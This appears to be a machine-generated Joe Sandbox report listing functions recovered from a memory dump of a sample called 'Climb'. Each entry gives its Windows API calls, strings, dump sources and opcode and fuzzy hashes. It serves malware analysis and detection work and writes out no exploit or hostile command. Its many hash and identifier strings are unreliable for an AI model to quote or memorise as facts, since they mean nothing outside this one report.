Instruction Fuzzy Hash: D341C4312043829FD724DF26D8C4B5BB7E8AF84715F144A1EF46597391C738E905CB6A

Function 00514EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0051DCD0,00000000,?,?,?,?), ref: 00514F48
GetWindowLongW.USER32 ref: 00514F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00514F75

Strings

SysTreeView32, xrefs: 00514F1A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 498de8ced15807b25861a194fb8f5a6ec80eb120144b14a118e3307919907381
Instruction ID: 704f58dc81d523014252238b2810f563aa4a2c7981e2e2e6818fe89f217852ee
Opcode Fuzzy Hash: 498de8ced15807b25861a194fb8f5a6ec80eb120144b14a118e3307919907381
Instruction Fuzzy Hash: 63319271214205AFEB219F78CC45BEA7BA9FB08378F205B15F979922E0C774EC919B50

Function 00503AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00503DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00503AD4,?,?), ref: 00503DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00503AD7
_wcslen.LIBCMT ref: 00503AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00503B63

Strings

255.255.255.255, xrefs: 00503AF2, 00503AF7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: dd5535f6c928a22602c119549b13755cdd5c1eac38dd4fdffa9e3472e4cabc85
Instruction ID: 831ee8e60845dc78134be52c75850857ad590818251696416164fa8fd0336e0b
Opcode Fuzzy Hash: dd5535f6c928a22602c119549b13755cdd5c1eac38dd4fdffa9e3472e4cabc85
Instruction Fuzzy Hash: 92318F396002019FCB10CF69C585AAD7BE8FF54328F248559E8168B2D2D775EE45CB60

Function 00514954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005149DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005149F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00514A14

Strings

SysMonthCal32, xrefs: 005149A7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3f29f1409a35015d0f8dcb7067daf25b4dba902a945e5c30ce4aed774d1cddfd
Instruction ID: 280973d645c2ea01e77aca92aaa8745abd11a27b0796563e2695e3bee334238f
Opcode Fuzzy Hash: 3f29f1409a35015d0f8dcb7067daf25b4dba902a945e5c30ce4aed774d1cddfd
Instruction Fuzzy Hash: 6821BF32600219ABEF118FA0CC46FEF3B69FF48718F111214FA156B0D0D6B5A8959BA0

Function 005150F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005151A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005151B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005151B8

Strings

msctls_updown32, xrefs: 00515122

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6b6aa811fbb95ce2585b9a38fe0a606f95105482c3c9aa663c5d0a2fa93fb4a1
Instruction ID: 98a69ba6e5fe0fc98d961b96d30e5696f538c5d6929f7686e564e2931e2eb28c
Opcode Fuzzy Hash: 6b6aa811fbb95ce2585b9a38fe0a606f95105482c3c9aa663c5d0a2fa93fb4a1
Instruction Fuzzy Hash: 3E216DB5600609BFEB11DF24CC85EAA3BBDFB9A368B040449F90097361DA74EC45DBA0

Function 00514253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005142DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005142EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00514312

Strings

Listbox, xrefs: 005142AB

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 55e86acf5f07a983e9bb5b1f98a7d5980b8e5dfbd6626dd4953b8d520e4f045f
Instruction ID: c42617aa70f4e9658c0479e7e4940816ac344cb388e63962e58fc5a572408e90
Opcode Fuzzy Hash: 55e86acf5f07a983e9bb5b1f98a7d5980b8e5dfbd6626dd4953b8d520e4f045f
Instruction Fuzzy Hash: 6321BE32600218BBEF119F94CC84FFF3B6EFB99764F118114F9149B190CA719C928BA0

Function 004F5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004F54A1
SetErrorMode.KERNEL32(00000000,?,?,0051DCD0), ref: 004F5515

Strings

%lu, xrefs: 004F54B4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 8fd98a08345ef58efd7b8956e13f5ee4eb7b92c0d49b42167f66472a330d42c2
Instruction ID: 87b923be36728cbf6fce5f2246b2b8d49b7a36146ed50285e56ee41ebd2349d6
Opcode Fuzzy Hash: 8fd98a08345ef58efd7b8956e13f5ee4eb7b92c0d49b42167f66472a330d42c2
Instruction Fuzzy Hash: CD316474A00109AFDB10EF55C885EAE7BF8EF04308F148099E509DB352D775EE45DB65

Function 00518305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00518339
EnumChildWindows.USER32(?,0051802F,00000000), ref: 005183B0

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

Strings

(U, xrefs: 00518317
(U, xrefs: 0051834A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: (U$(U
API String ID: 3814560230-3130032496
Opcode ID: 03641f973524313c95ef6ff2cc3f5d80b5e940ff793478b174212a496e98ceb3
Instruction ID: 159b3d8986213098da261e18176e7a01d2e4df8acbf6062f1f2f8fdb2618d5cf
Opcode Fuzzy Hash: 03641f973524313c95ef6ff2cc3f5d80b5e940ff793478b174212a496e98ceb3
Instruction Fuzzy Hash: 9E216D79200305CFD724DF28D850AA6BBF5FF5A721F240B19E875873A0DB70A884EB60

Function 00514C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00514CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00514D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00514D0F

Strings

msctls_trackbar32, xrefs: 00514CC4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 92216202a6b64527ad2e6bfb4c0fa2a52b0ec56753b433b75bbc683337b18184
Instruction ID: db790f08abb1f909c338355b9492e4c3abdade282268e726ec5418f9ed2cd129
Opcode Fuzzy Hash: 92216202a6b64527ad2e6bfb4c0fa2a52b0ec56753b433b75bbc683337b18184
Instruction Fuzzy Hash: A511E071240248BEEF205F69DC06FEB3BA8FF85B68F110524FA55E20A0C671DCA1DB60

Function 004E389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

Part of subcall function 004E36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004E3712
Part of subcall function 004E36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E3723
Part of subcall function 004E36F4: GetCurrentThreadId.KERNEL32 ref: 004E372A
Part of subcall function 004E36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004E3731

GetFocus.USER32 ref: 004E38C4

Part of subcall function 004E373B: GetParent.USER32(00000000), ref: 004E3746

GetClassNameW.USER32(?,?,00000100), ref: 004E390F
EnumChildWindows.USER32(?,004E3987), ref: 004E3937

Strings

%s%d, xrefs: 004E394B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 9803723b8db224ee1cb971022de7c23def177dbac8248744d6a0d1091b29f7ed
Instruction ID: c19eecfd7fceb1e85e0036fafccfaa922eed06928134eb128e302529a2b5e1c8
Opcode Fuzzy Hash: 9803723b8db224ee1cb971022de7c23def177dbac8248744d6a0d1091b29f7ed
Instruction Fuzzy Hash: 7011E7B56002456BCF12BF768C89AED7769AF94309F00807EBD099B293CF785909DB34

Function 004859FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00485A34
DestroyWindow.USER32(?,004837B8,?,?,?,?,?,00483709,?,?), ref: 00485A91

Strings

<)U, xrefs: 004C4F34
<)U, xrefs: 00485A09

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)U$<)U
API String ID: 2587070983-2140740112
Opcode ID: 69f5568cac4f340002e1eb4dac5f2d4b420e5de438a059f39e5117266ff9c281
Instruction ID: 0b7724e78d44e89d0379056618576b9bdf84b1da58b723acfe9c67b971fcda51
Opcode Fuzzy Hash: 69f5568cac4f340002e1eb4dac5f2d4b420e5de438a059f39e5117266ff9c281
Instruction Fuzzy Hash: 1221FC35206605CFDB18EB15E8B4B6D37F1BB66316F04855EE80297360CB38AC89EB49

Function 00516321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00516360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0051638D
DrawMenuBar.USER32(?), ref: 0051639C

Strings

0, xrefs: 0051632E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 53ba0496d0fbb7756c54a7dc8b154ef19f48c1d41b4b05093ed77b63a909a140
Instruction ID: 287a63390dde0737f869983c6595a1c7695ff2bece2903e1c6ff8c2ffc6ef6a9
Opcode Fuzzy Hash: 53ba0496d0fbb7756c54a7dc8b154ef19f48c1d41b4b05093ed77b63a909a140
Instruction Fuzzy Hash: 70018775600218AFEB209F21DC84BEA7FB5FB45314F10849AE80AD6150DB308A89EF20

Function 0051823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,005528E0,0051AD55,000000FC,?,00000000,00000000,?), ref: 0051823F
GetFocus.USER32 ref: 00518247

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

Part of subcall function 00482234: GetWindowLongW.USER32(?,000000EB), ref: 00482242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 005182B4

Strings

(U, xrefs: 00518254

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (U
API String ID: 3601265619-2725093197
Opcode ID: a9131937bde8dcd731dd7a91ff32c402f57ab01e0b08045d644a5e1bbada9d11
Instruction ID: 331663dac161f0bd2fc895ac0e1e3903a80ddca7925a018b230c7f6ed16595a2
Opcode Fuzzy Hash: a9131937bde8dcd731dd7a91ff32c402f57ab01e0b08045d644a5e1bbada9d11
Instruction Fuzzy Hash: 82015235202610CFD725DB68D894AB937F6FF8A325F18415DE426873A0CB316C8BCB50

Function 00518526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00518576
CreateAcceleratorTableW.USER32(00000000,?,?,?,004FBE96,00000000,00000000,?,00000001,00000002), ref: 0051858C
GetForegroundWindow.USER32(?,004FBE96,00000000,00000000,?,00000001,00000002), ref: 00518595

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

Strings

(U, xrefs: 00518532

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (U
API String ID: 986409557-2725093197
Opcode ID: 8026d73c23f7976697d9fb6bfd089370b8bf5a46d75ceef904e21deaba943c0d
Instruction ID: 056379ccde5149dd6b18ec417fbd47a7eb638a84d7ff9b31173379d4d4cef4e9
Opcode Fuzzy Hash: 8026d73c23f7976697d9fb6bfd089370b8bf5a46d75ceef904e21deaba943c0d
Instruction Fuzzy Hash: 68012D35501704EFDB349F69DC94AA53BF2FB25326F118519F511863B0DB30A9D8EB90

Function 00518BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00554038,0055407C), ref: 00518C1A
CloseHandle.KERNEL32 ref: 00518C2C

Strings

8@U, xrefs: 00518BD6
|@U, xrefs: 00518BE5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@U$|@U
API String ID: 3712363035-1619541439
Opcode ID: 3b86ed9f2b14bdc3c40ee92e7fc7758f6d3fe9ca4410d91d38053d9bad827eca
Instruction ID: 90fecbe3650631ab85de4186de8f0ac65fa34a3a618558d834a38a1b65253041
Opcode Fuzzy Hash: 3b86ed9f2b14bdc3c40ee92e7fc7758f6d3fe9ca4410d91d38053d9bad827eca
Instruction Fuzzy Hash: ACF0B4B2141304BAF3106B656C5DFB73EACEB2535AF104421BF08D90F1D6754C48EAB9

Function 004DE778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004DE797
FreeLibrary.KERNEL32 ref: 004DE7BD

Strings

X64, xrefs: 004DE680
GetSystemWow64DirectoryW, xrefs: 004DE791

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 37e49fb1f7b9d704c92d065e3c7e7c5cbef075ff9a33049feb8f090d6a0eeef7
Instruction ID: d369708e93b152cf616bbb08c4892783e0048b197f57abd277a76b4ec445632c
Opcode Fuzzy Hash: 37e49fb1f7b9d704c92d065e3c7e7c5cbef075ff9a33049feb8f090d6a0eeef7
Instruction Fuzzy Hash: E7E0E571841620EBEB6567214CA4FEA2A247F20701B5505ABFC05FA340DB2CCC89D66D

Function 004E096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6de59f957cf7312ede3f8807c7244702f215a69923e24938945c2eb3aacf669
Instruction ID: c504fec93cff2dff915e2eeefefcd23c2b2a13866482f81cfe8219bbd731606d
Opcode Fuzzy Hash: d6de59f957cf7312ede3f8807c7244702f215a69923e24938945c2eb3aacf669
Instruction Fuzzy Hash: E6C1AE75A0024AEFCB04CF95C884EAEB7B5FF48705F208599E415EB251D7B4EE82CB94

Function 004B41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004B427E
__alldvrm.LIBCMT ref: 004B447F
__alldvrm.LIBCMT ref: 004B44A1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 07bf4d877ad92b2d8a93a6c22e20281a05e799e0a3ac7ef08d201a2600249798
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 3EA15671A002869FDB15CF18C8917EEBBE0EF91314F1841AFE9959B382C67C8842C768

Function 004E0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00520BD4,?), ref: 004E0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00520BD4,?), ref: 004E0EF8
CLSIDFromProgID.OLE32(?,?,00000000,0051DCE0,000000FF,?,00000000,00000800,00000000,?,00520BD4,?), ref: 004E0F1D
_memcmp.LIBVCRUNTIME ref: 004E0F3E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
